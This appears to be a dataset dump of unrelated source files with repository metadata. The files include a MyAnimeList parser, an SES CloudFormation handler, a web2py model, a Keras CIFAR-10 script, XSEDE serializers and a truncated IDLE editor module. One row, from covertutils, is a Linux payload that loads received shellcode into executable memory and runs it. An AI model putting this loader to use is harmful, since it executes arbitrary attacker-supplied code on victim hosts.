hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8ba078046387df1c709f426807177e2c976ba89d | 2,100 | py | Python | mal/parsers/anime/characters.py | Nearata/myanimelist-rest-api | f254e53e7f54415c6b11f5b2e9a8afe142975f70 | [
"Unlicense"
] | 1 | 2020-11-11T14:55:23.000Z | 2020-11-11T14:55:23.000Z | mal/parsers/anime/characters.py | Nearata/myanimelist-rest-api | f254e53e7f54415c6b11f5b2e9a8afe142975f70 | [
"Unlicense"
] | 5 | 2021-03-31T19:26:31.000Z | 2021-08-09T13:33:07.000Z | mal/parsers/anime/characters.py | Nearata/myanimelist-rest-api | f254e53e7f54415c6b11f5b2e9a8afe142975f70 | [
"Unlicense"
] | null | null | null | from re import compile as re_compile
from bs4 import BeautifulSoup
from ...const import MAL_CDN_URL
class Characters:
def __init__(self, soup: BeautifulSoup) -> None:
self.soup = soup
def __call__(self) -> dict:
return {
"data": [
{
"url": i.select_one("td:nth-of-type(1) > div.picSurround > a").get(
"href"
),
"imageUrl": self.__image_url(
i.select_one(
"td:nth-of-type(1) > div.picSurround > a > img"
).get("data-src")
),
"name": i.select_one("td:nth-of-type(2) > a").get_text(),
"role": i.select_one("td:nth-of-type(2) > div > small").get_text(),
"voiceActors": [
{
"name": actor.select_one(
"td:nth-of-type(1) > a"
).get_text(),
"language": actor.select_one(
"td:nth-of-type(1) > small"
).get_text(),
"url": actor.select_one(
"td:nth-of-type(2) > div.picSurround > a"
).get("href"),
"image": actor.select_one(
"td:nth-of-type(2) > div.picSurround > a > img"
).get("data-src"),
}
for actor in i.select("td:nth-of-type(3) > table tr")
],
}
for i in reversed(
self.soup.select_one("a[name=staff]").find_previous_siblings(
"table"
)
)
]
}
def __image_url(self, string: str) -> str:
regex = re_compile(r"\b\/images\/characters\/\d{1,}\/\d{1,}.jpg\b")
return f"{MAL_CDN_URL}{''.join(regex.findall(string))}"
| 38.181818 | 87 | 0.382381 |
5a45b2887d00b67602744b2637d42efbc3749b06 | 843 | py | Python | covertutils/covertutils/payloads/linux/shellcode.py | aidden-laoch/sabre | 0940aa51dfc5074291df9d29db827ddb4010566d | [
"MIT"
] | 2 | 2020-11-23T23:54:32.000Z | 2021-05-25T12:28:05.000Z | commander/thirdparty/covertutils/payloads/linux/shellcode.py | how2how/ToyHome | 4457b1d28e21ed6fd4ab980a0f7fed345c570ae3 | [
"Apache-2.0"
] | 1 | 2021-03-20T05:43:02.000Z | 2021-03-20T05:43:02.000Z | commander/thirdparty/covertutils/payloads/linux/shellcode.py | how2how/ToyHome | 4457b1d28e21ed6fd4ab980a0f7fed345c570ae3 | [
"Apache-2.0"
] | null | null | null |
def work( storage, message ) :
from ctypes import CDLL, c_char_p, c_void_p, memmove, cast, CFUNCTYPE, create_string_buffer
from multiprocessing import Process
shellcode = message
size = len(shellcode)
# print( len(shellcode) )
libc = CDLL('libc.so.6')
sc = c_char_p(shellcode)
addr = c_void_p(libc.valloc(size))
print( "Memoving" )
memmove(addr, sc, size)
print( "Changing page protection" )
libc.mprotect(addr, size, 0x7)
print( "Making the process code" )
run = cast(addr, CFUNCTYPE(c_void_p))
# memorywithshell = create_string_buffer(shellcode, len(shellcode))
# libc.mprotect(memorywithshell, size, 0x7)
# run = cast(memorywithshell, CFUNCTYPE(c_void_p))
# run()
p = Process(target=run) # run the shellcode as independent process
p.start()
from covertutils.shells.subshells import ShellcodeSubShell as shell
| 27.193548 | 92 | 0.736655 |
1518201ce98fea4e3467c93689577aa38326e47d | 1,603 | py | Python | src/ses.py | dc-pm/cfn-ses-provider | f72ac887c37a779a571b41ea8aeef6f468230e1a | [
"Apache-2.0"
] | 38 | 2018-03-08T12:06:03.000Z | 2022-03-25T14:15:10.000Z | src/ses.py | dc-pm/cfn-ses-provider | f72ac887c37a779a571b41ea8aeef6f468230e1a | [
"Apache-2.0"
] | 13 | 2018-12-22T10:49:33.000Z | 2021-06-26T14:48:57.000Z | src/ses.py | dc-pm/cfn-ses-provider | f72ac887c37a779a571b41ea8aeef6f468230e1a | [
"Apache-2.0"
] | 29 | 2018-11-05T10:52:23.000Z | 2022-03-29T16:09:36.000Z | import os
import logging
import cfn_dkim_provider
import dkim_tokens_provider
import domain_identity_provider
import mail_from_domain_provider
import active_rule_set_provider
import verified_identity_provider
import verified_mail_from_domain_provider
import identity_notifications_provider
import identity_policy_provider
def handler(request, context):
logging.basicConfig(level=os.getenv("LOG_LEVEL", "INFO"))
if request["ResourceType"] == "Custom::DkimTokens":
return dkim_tokens_provider.handler(request, context)
elif request["ResourceType"] == "Custom::DomainIdentity":
return domain_identity_provider.handler(request, context)
elif request["ResourceType"] in [
"Custom::SESActiveReceiptRuleSet",
"Custom::ActiveReceiptRuleSet",
]:
return active_rule_set_provider.handler(request, context)
elif request["ResourceType"] == "Custom::IdentityNotifications":
return identity_notifications_provider.handler(request, context)
elif request["ResourceType"] == "Custom::VerifiedIdentity":
return verified_identity_provider.handler(request, context)
elif request["ResourceType"] == "Custom::IdentityPolicy":
return identity_policy_provider.handler(request, context)
elif request["ResourceType"] == "Custom::MailFromDomain":
return mail_from_domain_provider.handler(request, context)
elif request["ResourceType"] == "Custom::VerifiedMailFromDomain":
return verified_mail_from_domain_provider.handler(request, context)
else:
return cfn_dkim_provider.handler(request, context)
| 43.324324 | 75 | 0.768559 |
2dd7522440b4fa236f41ad62b4379656ff3dfbef | 3,336 | py | Python | web2py-appliances-master/HotelManagementExample/models/db.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | web2py-appliances-master/HotelManagementExample/models/db.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | web2py-appliances-master/HotelManagementExample/models/db.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#########################################################################
## This scaffolding model makes your app work on Google App Engine too
## File is released under public domain and you can use without limitations
#########################################################################
if not request.env.web2py_runtime_gae:
## if NOT running on Google App Engine use SQLite or other DB
db = DAL('sqlite://storage.sqlite')
else:
## connect to Google BigTable (optional 'google:datastore://namespace')
db = DAL('google:datastore')
## store sessions and tickets there
session.connect(request, response, db = db)
## or store session in Memcache, Redis, etc.
## from gluon.contrib.memdb import MEMDB
## from google.appengine.api.memcache import Client
## session.connect(request, response, db = MEMDB(Client()))
## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []
## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'
#########################################################################
## Here is sample code if you need for
## - email capabilities
## - authentication (registration, login, logout, ... )
## - authorization (role based authorization)
## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)
## - old style crud actions
## (more options discussed in gluon/tools.py)
#########################################################################
from gluon.tools import Auth, Crud, Service, PluginManager, prettydate
auth = Auth(db, hmac_key=Auth.get_or_create_key())
crud, service, plugins = Crud(db), Service(), PluginManager()
## create all tables needed by auth if not custom tables
auth.define_tables()
## configure email
mail=auth.settings.mailer
mail.settings.server = 'logging' or 'smtp.gmail.com:587'
mail.settings.sender = 'you@gmail.com'
mail.settings.login = 'username:password'
## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True
## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.
## register with janrain.com, write your domain:api_key in private/janrain.key
from gluon.contrib.login_methods.rpx_account import use_janrain
use_janrain(auth,filename='private/janrain.key')
#########################################################################
## Define your tables below (or better in another model file) for example
##
## >>> db.define_table('mytable',Field('myfield','string'))
##
## Fields can be 'string','text','password','integer','double','boolean'
## 'date','time','datetime','blob','upload', 'reference TABLENAME'
## There is an implicit 'id integer autoincrement' field
## Consult manual for more options, validators, etc.
##
## More API examples for controllers:
##
## >>> db.mytable.insert(myfield='value')
## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)
## >>> for row in rows: print row.id, row.myfield
#########################################################################
| 42.769231 | 78 | 0.63699 |
bd5cea031009ccd1e685e973934c20e7b017688a | 7,203 | py | Python | dcnn.py | jessejlt/cifar10 | 0be30b0bfdd294030376999da6f5b8ae473e5751 | [
"MIT"
] | null | null | null | dcnn.py | jessejlt/cifar10 | 0be30b0bfdd294030376999da6f5b8ae473e5751 | [
"MIT"
] | null | null | null | dcnn.py | jessejlt/cifar10 | 0be30b0bfdd294030376999da6f5b8ae473e5751 | [
"MIT"
] | null | null | null | from __future__ import print_function
import numpy as np
from keras.datasets import cifar10
from keras.callbacks import TensorBoard
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.utils import np_utils
from keras import backend as K
# Reproducability of initialization
np.random.seed(42)
# Going to use convnets, in part, because fully connected layers,
# for images, would result in too many weights. While our current
# set 32x32x3 is somewhat managable, larger images, say 200x200,
# would require 120k weights!
# Number of images to process at a time.
batch_size = 128
# cifar10 has 10 different kinds of objects.
nb_classes = 10
# Image dimensions.
img_rows, img_cols = 32, 32
#
# Now our adjustable hyperparameters...
#
# How long we train.
nb_epochs = 45
# Number of convnets.
nb_filters = 32
# Size of max pooling. This is how many pixels we'll inspect at a time
# to find details. Decrease if details are closer together. Remember
# That spacial relationships are lost to the convnet.
pool_size = (2, 2)
# Convent kernel size. TODO add definition.
kernel_size = (3, 3)
#
# End hyperparameters
#
# Load our data. We want to partition the data into training and test.
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
# Tensorflow and Theano have different tensor parameter orders, so we need
# to inspect the backend and load our tensors accordingly.
if K.image_dim_ordering() == 'th':
X_train = X_train.reshape(X_train.shape[0], 3, img_rows, img_cols)
X_test = X_test.reshape(X_test.shape[0], 3, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 3)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 3)
input_shape = (img_rows, img_cols, 3)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print('X_train shape:', X_train.shape)
print('X_train.shape[0]:', X_train.shape[0])
print('X_test.shape[0]:', X_test.shape[0])
# Convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
y_test = np_utils.to_categorical(y_test, nb_classes)
# Start with our layers
model = Sequential()
# Initialize our convnet with our filters, rows, and columns.
# Our convolution network is providing a means of subsampling,
# which is allowing our neurons to detect patterns without
# spacial orientation. Consider a picture of a human face. We
# might want our neurons to recognize eyes without their relationship
# to a nose, which is beneficial when an image of a face might be
# partially obstructed. This whole process is trying to get our
# neurons to ~generalize~ by detecting discrete patterns and applying
# them to a greater classification scheme.
model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1],
border_mode='valid',
input_shape=input_shape))
# Values leaving neurons are modified via the Activation function.
# In this scenario we're using relu, which is 0 for x < 0, and
# identity thereafter.
model.add(Activation('relu'))
# Another convnet. At this point our first convent has built up some
# set of recognizers and we've clamped their values by passing them
# through an activation function. Now we'll do it all over again.
# The "shape" of this model that we're building can be thought of as
# yet another hyperparameter, which means adding another convnet, or
# changing our activation functions will impact the acurracy of our
# model and is therefore subject to change. What is the "correct"
# model paramters? Who knows. At this point we're brute-forcing a solution.
# Also notice that this convnet is the same as our first. If we had more than
# these two, we would want to wrap these up into a model generator to
# reduce repitition.
model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1]))
# And again through relu. How would our accuracy be impacted if we changed
# this to softmax?
model.add(Activation('relu'))
# Pooling just takes the output of our convnet and extracts the greatest value.
# So let's say we have a convnet that produces a 4x4 set of pixels, pooling
# would extract the greatest value from said pixel set. It's all about
# downsampling to reduce the data size.
model.add(MaxPooling2D(pool_size=pool_size))
# We're going to randomly ignore 25% of neurons during forward feeding
# in an attempt to prevent overfitting. Overfitting is where a neuron
# learns specific traits from a training set, which then makes it less
# useful for data it hasn't yet seen. Dropout forces the neurons to generalize.
model.add(Dropout(0.25))
# Now we add our "dense" layers, or fully connected layers.
# Flatten takes a shape like (64, 32, 32) and produces (65536).
model.add(Flatten())
# Dense is a fully connected network. In this example we're creating
# 256 fully connected neurons. And again, both the use of "Dense" and
# the value of "256" are hyperparameters for our model. Let's of
# guess-work here.
model.add(Dense(256))
model.add(Activation('relu'))
# Agressive dropout. We're only willing to use half the nueron's per epoch.
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
# Why softmax instead of relu? In general, relu has been found, through trial
# and error, to be better for convnets and softmax for dense networks.
model.add(Activation('softmax'))
# Ship it! Our code doesn't actually execute the model, instead, it builds a
# graph that describes our model, which is then passed off to a backend, in
# this case, Tensorflow.
# So about these parameters. Remember what we're doing here. We have a bunch
# of training and test images, and a model that is, hopefully, going to figure
# out a bunch of weights and biases that produce a high prediction accuracy
# against our test images. So we iterate over our images, crunch some numbers,
# and make a prediction. Then we compare our prediction against the actual
# known values. Then, through gradient descent, determine if our predictions
# are getting better or worse and adjust our model's values accordingly. We
# do this over and over until, again hopefully, our model begins to converge
# around our test images, meaning that our model has learned to generalize
# the necessary patterns towards a highly accurate classification.
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
# Okay so we've loaded our training and test data, built and compiled
# our model, now let's add some metadata to our project so we
# can use Tensorflow's incredibly helpful visualizer, Tensorboard!
tb = TensorBoard(log_dir='./logs')
# Now instruct our model how to run and link its output to Tensorboard
# for those visuals.
model.fit(X_train,
Y_train,
batch_size=batch_size,
nb_epoch=nb_epochs,
verbose=1,
validation_data=(X_test, y_test),
callbacks=[tb])
score = model.evaluate(X_test, y_test, verbose=0)
print('Test score:', score[0])
print("Accuracy: %.2f%%" % (score[1]*100))
| 42.370588 | 79 | 0.752048 |
efd3bc46d53c055a47f6a771f835039587a04c59 | 16,074 | py | Python | django_xsede_warehouse/warehouse_views/serializers.py | XSEDE/XSEDE_Information_Warehouse | 8b3aab42b7afd70ce69b9bf44551a0ded4491831 | [
"Apache-2.0"
] | 1 | 2019-10-29T22:50:29.000Z | 2019-10-29T22:50:29.000Z | django_xsede_warehouse/warehouse_views/serializers.py | XSEDE/XSEDE_Information_Warehouse | 8b3aab42b7afd70ce69b9bf44551a0ded4491831 | [
"Apache-2.0"
] | null | null | null | django_xsede_warehouse/warehouse_views/serializers.py | XSEDE/XSEDE_Information_Warehouse | 8b3aab42b7afd70ce69b9bf44551a0ded4491831 | [
"Apache-2.0"
] | null | null | null | from django.utils import timezone
from rest_framework import serializers
from rest_framework.relations import PrimaryKeyRelatedField
from glue2_db.models import ApplicationEnvironment, ApplicationHandle, Endpoint, ComputingManager, ExecutionEnvironment
from glue2_db.serializers import ApplicationHandle_DbSerializer
from outages.models import Outages
from rdr_db.models import RDRResource
from xdcdb.models import TGResource
#class JSONSerializerField(serializers.Field):
# """ Serializer for JSONField -- required to make field writable"""
# def to_internal_value(self, data):
# return data
# def to_representation(self, value):
# return value
class Generic_Resource_Serializer(serializers.ModelSerializer):
# Note: recommended_use and access_description come from compute sub-resources
ResourceID = serializers.CharField(source='info_resourceid')
SiteID = serializers.CharField(source='info_siteid')
OrganizationAbbrev = serializers.SerializerMethodField()
OrganizationName = serializers.SerializerMethodField()
AmieName = serializers.SerializerMethodField()
PopsName = serializers.SerializerMethodField()
XcdbName = serializers.SerializerMethodField()
class Meta:
model = RDRResource
fields = ('ResourceID', 'SiteID',
'rdr_resource_id', 'rdr_type', 'parent_resource',
'resource_descriptive_name', 'resource_description',
'current_statuses', 'latest_status', 'latest_status_begin', 'latest_status_end',
'recommended_use', 'access_description',
'project_affiliation', 'provider_level', 'updated_at',
'OrganizationAbbrev', 'OrganizationName',
'AmieName','PopsName', 'XcdbName')
def get_OrganizationAbbrev(self, RDRResource):
try:
XCDB_object = TGResource.objects.get(pk=RDRResource.info_resourceid)
if XCDB_object:
return XCDB_object.OrganizationAbbrev
except TGResource.DoesNotExist:
pass
return None
def get_OrganizationName(self, RDRResource):
try:
XCDB_object = TGResource.objects.get(pk=RDRResource.info_resourceid)
if XCDB_object:
return XCDB_object.OrganizationName
except TGResource.DoesNotExist:
pass
return None
def get_AmieName(self, RDRResource):
try:
XCDB_object = TGResource.objects.get(pk=RDRResource.info_resourceid)
if XCDB_object:
return XCDB_object.AmieName
except TGResource.DoesNotExist:
pass
return None
def get_PopsName(self, RDRResource):
try:
XCDB_object = TGResource.objects.get(pk=RDRResource.info_resourceid)
if XCDB_object:
return XCDB_object.PopsName
except TGResource.DoesNotExist:
pass
return None
def get_XcdbName(self, RDRResource):
try:
XCDB_object = TGResource.objects.get(pk=RDRResource.info_resourceid)
if XCDB_object:
return XCDB_object.TgcdbResourceName
except TGResource.DoesNotExist:
pass
return None
class Software_Full_Serializer(serializers.ModelSerializer):
SiteID = serializers.SerializerMethodField('get_siteid')
AppName = serializers.CharField(source='ApplicationEnvironment.AppName')
AppVersion = serializers.CharField(source='ApplicationEnvironment.AppVersion')
Description = serializers.CharField(source='ApplicationEnvironment.Description')
Handle = serializers.SerializerMethodField('get_handle')
Domain = serializers.SerializerMethodField('get_category')
Keywords = serializers.SerializerMethodField('get_keywords')
SupportStatus = serializers.SerializerMethodField('get_supportstatus')
Repository = serializers.SerializerMethodField('get_repository')
class Meta:
model = ApplicationHandle
fields = ('ResourceID', 'SiteID', 'AppName', 'AppVersion', 'Description', 'Handle', 'Domain',
'Keywords', 'SupportStatus', 'Repository', 'CreationTime','ID')
def get_siteid(self, ApplicationHandle):
try:
RDR_object = RDRResource.objects.filter(rdr_type='resource').filter(info_resourceid=ApplicationHandle.ResourceID)
if RDR_object and RDR_object[0] and RDR_object[0].info_siteid:
return RDR_object[0].info_siteid
except RDRResource.DoesNotExist:
pass
return None
def get_handle(self, ApplicationHandle):
return({'HandleType': ApplicationHandle.Type,
'HandleKey': ApplicationHandle.Value
})
def get_category(self, ApplicationHandle):
try:
return ApplicationHandle.ApplicationEnvironment.EntityJSON['Extension']['Category']
except:
return []
def get_keywords(self, ApplicationHandle):
try:
return ApplicationHandle.ApplicationEnvironment.EntityJSON['Keywords']
except:
return []
def get_supportstatus(self, ApplicationHandle):
try:
return ApplicationHandle.ApplicationEnvironment.EntityJSON['Extension']['SupportStatus']
except:
return []
def get_repository(self, ApplicationHandle):
try:
return ApplicationHandle.ApplicationEnvironment.EntityJSON['Repository']
except:
return []
# Same as Software_Full_Serializer but adds SupportContact
class Software_Community_Serializer(serializers.ModelSerializer):
SiteID = serializers.SerializerMethodField('get_siteid')
AppName = serializers.CharField(source='ApplicationEnvironment.AppName')
AppVersion = serializers.CharField(source='ApplicationEnvironment.AppVersion')
Description = serializers.CharField(source='ApplicationEnvironment.Description')
Handle = serializers.SerializerMethodField('get_handle')
Domain = serializers.SerializerMethodField('get_category')
Keywords = serializers.SerializerMethodField('get_keywords')
SupportStatus = serializers.SerializerMethodField('get_supportstatus')
SupportContact = serializers.SerializerMethodField('get_supportcontact')
Repository = serializers.SerializerMethodField('get_repository')
class Meta:
model = ApplicationHandle
fields = ('ResourceID', 'SiteID', 'AppName', 'AppVersion', 'Description', 'Handle', 'Domain',
'Keywords', 'SupportStatus', 'SupportContact', 'Repository', 'CreationTime', 'ID')
def get_siteid(self, ApplicationHandle):
try:
RDR_object = RDRResource.objects.filter(rdr_type='resource').filter(info_resourceid=ApplicationHandle.ResourceID)
if RDR_object and RDR_object[0] and RDR_object[0].info_siteid:
return RDR_object[0].info_siteid
except RDRResource.DoesNotExist:
pass
return None
def get_handle(self, ApplicationHandle):
return({'HandleType': ApplicationHandle.Type,
'HandleKey': ApplicationHandle.Value
})
def get_category(self, ApplicationHandle):
try:
return ApplicationHandle.ApplicationEnvironment.EntityJSON['Extension']['Category']
except:
return []
def get_keywords(self, ApplicationHandle):
try:
return ApplicationHandle.ApplicationEnvironment.EntityJSON['Keywords']
except:
return []
def get_supportstatus(self, ApplicationHandle):
try:
return ApplicationHandle.ApplicationEnvironment.EntityJSON['Extension']['SupportStatus']
except:
return []
def get_supportcontact(self, ApplicationHandle):
try:
return ApplicationHandle.ApplicationEnvironment.EntityJSON['Extension']['SupportContact']
except:
return []
def get_repository(self, ApplicationHandle):
try:
return ApplicationHandle.ApplicationEnvironment.EntityJSON['Repository']
except:
return []
class SGCI_Resource_Serializer_100(serializers.ModelSerializer):
REMOVABLE_FIELDS = ['computeResources', 'storageResources', 'resourceOutages']
schemaVersion = serializers.SerializerMethodField()
host = serializers.CharField(source='info_resourceid')
name = serializers.CharField(source='resource_descriptive_name')
description = serializers.CharField(source='resource_description')
computeResources = serializers.SerializerMethodField()
storageResources = serializers.SerializerMethodField()
resourceStatus = serializers.SerializerMethodField()
resourceOutages = serializers.SerializerMethodField()
class Meta:
model = RDRResource
fields = ('schemaVersion', 'host', 'name', 'description', 'computeResources', 'storageResources', 'resourceStatus', 'resourceOutages')
def to_representation(self, instance):
rep = super().to_representation(instance)
for field in self.REMOVABLE_FIELDS:
try:
if rep[field] is None:
rep.pop(field)
except KeyError:
pass
return rep
def get_schemaVersion(self, RDRResource):
return('1.0.0')
def get_computeResources(self, RDRResource):
if RDRResource.rdr_type != 'compute':
return(None)
connections = []
eps = Endpoint.objects.filter(ResourceID=RDRResource.info_resourceid)
for ep in eps:
if ep.InterfaceName == 'org.globus.openssh':
for cp in ['SSH', 'SCP']:
for sp in ['SSHKEYS', 'X509']:
con = {'connectionProtocol': cp, 'securityProtocol': sp}
if ep.URL.startswith('gsissh://'):
url = ep.URL[len('gsissh://'):].rstrip('/')
else:
url = ep.URL[:]
if ':' in url:
host, port = url.split(':')
else:
host, port = url, 22
if host == ep.ResourceID:
con['port'] = int(port) or 22
else:
con['host'] = host
con['port'] = int(port)
connections.append(con)
elif ep.InterfaceName == 'org.globus.gridftp':
con = {'connectionProtocol': 'GRIDFTP', 'securityProtocol': 'X509'}
if ep.URL.startswith('gsiftp://'):
url = ep.URL[len('gsiftp://'):].rstrip('/')
else:
url = ep.URL[:]
if ':' in url:
host, port = url.split(':')
else:
host, port = url, 2811
if host == ep.ResourceID:
con['port'] = int(port) or 2811
else:
con['host'] = host
con['port'] = int(port) or 2811
connections.append(con)
batchSystem = {}
cm = ComputingManager.objects.filter(ResourceID=RDRResource.info_resourceid)
if cm and cm[0].Name:
batchSystem['jobManager'] = cm[0].Name
else:
batchSystem['jobManager'] = RDRResource.other_attributes.get('batch_system', 'N/A')
evs = ExecutionEnvironment.objects.filter(ResourceID=RDRResource.info_resourceid)
partitions = []
for ev in evs:
totalNodes = ev.EntityJSON.get('TotalInstances')
if not totalNodes:
extension = ev.EntityJSON.get('Extension')
if extension and extension.get('Nodes'):
totalNodes = len(extension.get('Nodes'))
cpuCount = ev.EntityJSON.get('LogicalCPUs')
par = {'name': ev.Name,
'nodeHardware': {
'cpuType': ev.EntityJSON.get('Platform', 'n/a'),
'memorySize': ev.EntityJSON.get('MainMemorySize', 'n/a') }
}
if totalNodes:
par['totalNodes'] = totalNodes
if cpuCount:
par['nodeHardware']['cpuCount'] = cpuCount
partitions.append(par)
if partitions:
batchSystem['partitions'] = partitions
batch = {'schedulerType': 'BATCH'}
if connections:
batch['connections'] = connections
if batchSystem:
batch['batchSystem'] = batchSystem
fork = {'schedulerType': 'FORK',
'forkSystem': {'systemType': 'LINUX'}
}
if connections:
fork['connections'] = connections
result = [batch, fork]
return(result)
def get_storageResources(self, RDRResource):
if RDRResource.rdr_type != 'storage':
return(None)
connections = []
eps = Endpoint.objects.filter(ResourceID=RDRResource.info_resourceid)
for ep in eps:
if ep.InterfaceName == 'org.globus.openssh':
for cp in ['SSH', 'SCP']:
for sp in ['SSHKEYS', 'X509']:
if ep.URL.startswith('gsissh://'):
url = ep.URL[len('gsissh://'):].rstrip('/')
else:
url = ep.URL[:]
con = {'connectionProtocol': cp, 'securityProtocol': sp}
if ':' in url:
host, port = url.split(':')
else:
host, port = url, 22
if host == ep.ResourceID:
con['port'] = int(port) or 22
else:
con['host'] = host
con['port'] = int(port)
connections.append(con)
elif ep.InterfaceName == 'org.globus.gridftp':
con = {'connectionProtocol': 'GRIDFTP', 'securityProtocol': 'X509'}
if ep.URL.startswith('gsiftp://'):
url = ep.URL[len('gsiftp://'):].rstrip('/')
else:
url = ep.URL[:]
if ':' in url:
host, port = url.split(':')
else:
host, port = url, 2811
if host == ep.ResourceID:
con['port'] = int(port) or 2811
else:
con['host'] = host
con['port'] = int(port) or 2811
connections.append(con)
storage = {'storageType': 'POSIX'}
if connections:
storage['connections'] = connections
result = [storage]
return(result)
def get_resourceStatus(self, RDRResource):
status = {'status': RDRResource.latest_status.capitalize()}
if RDRResource.latest_status_begin:
status['starts'] = '{:%Y-%m-%d}'.format(RDRResource.latest_status_begin)
if RDRResource.latest_status_end:
status['ends'] = '{:%Y-%m-%d}'.format(RDRResource.latest_status_end)
return(status)
def get_resourceOutages(self, RDRResource):
now = timezone.now()
outages = []
# current and future outages all end in the future
for out in Outages.objects.filter(ResourceID=RDRResource.info_resourceid, OutageEnd__gte=now):
item = {'type': out.OutageType.capitalize(),
'name': out.Subject,
'startsDatetime': out.OutageStart.isoformat(),
'endsDatetime': out.OutageEnd.isoformat()}
if out.Content:
item['description'] = out.Content
if out.WebURL:
item['url'] = out.WebURL
outages.append(item)
if outages:
return(outages)
else:
return(None)
| 42.188976 | 142 | 0.593629 |
f4437668a3edb84ac0420d5f83552363d7e9d974 | 67,653 | py | Python | Lib/idlelib/editor.py | vahtras/cpython | a0bb51e44cd43a7d2836a96a3804162203e44514 | [
"CNRI-Python-GPL-Compatible"
] | 2 | 2019-09-02T14:20:59.000Z | 2021-02-16T13:22:40.000Z | Lib/idlelib/editor.py | Exifers/cpython | a5b76167dedf4d15211a216c3ca7b98e3cec33b8 | [
"CNRI-Python-GPL-Compatible"
] | 2 | 2019-04-23T15:32:51.000Z | 2019-05-10T20:32:32.000Z | Lib/idlelib/editor.py | Munyola/cpython | 11303dd6035a7d7f78025ce5a3e3b9bdf7380c9a | [
"CNRI-Python-GPL-Compatible"
] | 1 | 2019-05-20T14:20:34.000Z | 2019-05-20T14:20:34.000Z | import importlib.abc
import importlib.util
import os
import platform
import string
import tokenize
import traceback
import webbrowser
from tkinter import *
from tkinter.ttk import Scrollbar
import tkinter.simpledialog as tkSimpleDialog
import tkinter.messagebox as tkMessageBox
from idlelib.config import idleConf
from idlelib import configdialog
from idlelib import grep
from idlelib import help
from idlelib import help_about
from idlelib import macosx
from idlelib.multicall import MultiCallCreator
from idlelib import pyparse
from idlelib import query
from idlelib import replace
from idlelib import search
from idlelib import window
# The default tab setting for a Text widget, in average-width characters.
TK_TABWIDTH_DEFAULT = 8
_py_version = ' (%s)' % platform.python_version()
darwin = sys.platform == 'darwin'
def _sphinx_version():
"Format sys.version_info to produce the Sphinx version string used to install the chm docs"
major, minor, micro, level, serial = sys.version_info
release = '%s%s' % (major, minor)
release += '%s' % (micro,)
if level == 'candidate':
release += 'rc%s' % (serial,)
elif level != 'final':
release += '%s%s' % (level[0], serial)
return release
class EditorWindow(object):
from idlelib.percolator import Percolator
from idlelib.colorizer import ColorDelegator, color_config
from idlelib.undo import UndoDelegator
from idlelib.iomenu import IOBinding, encoding
from idlelib import mainmenu
from idlelib.statusbar import MultiStatusBar
from idlelib.autocomplete import AutoComplete
from idlelib.autoexpand import AutoExpand
from idlelib.calltip import Calltip
from idlelib.codecontext import CodeContext
from idlelib.paragraph import FormatParagraph
from idlelib.parenmatch import ParenMatch
from idlelib.rstrip import Rstrip
from idlelib.squeezer import Squeezer
from idlelib.zoomheight import ZoomHeight
filesystemencoding = sys.getfilesystemencoding() # for file names
help_url = None
def __init__(self, flist=None, filename=None, key=None, root=None):
# Delay import: runscript imports pyshell imports EditorWindow.
from idlelib.runscript import ScriptBinding
if EditorWindow.help_url is None:
dochome = os.path.join(sys.base_prefix, 'Doc', 'index.html')
if sys.platform.count('linux'):
# look for html docs in a couple of standard places
pyver = 'python-docs-' + '%s.%s.%s' % sys.version_info[:3]
if os.path.isdir('/var/www/html/python/'): # "python2" rpm
dochome = '/var/www/html/python/index.html'
else:
basepath = '/usr/share/doc/' # standard location
dochome = os.path.join(basepath, pyver,
'Doc', 'index.html')
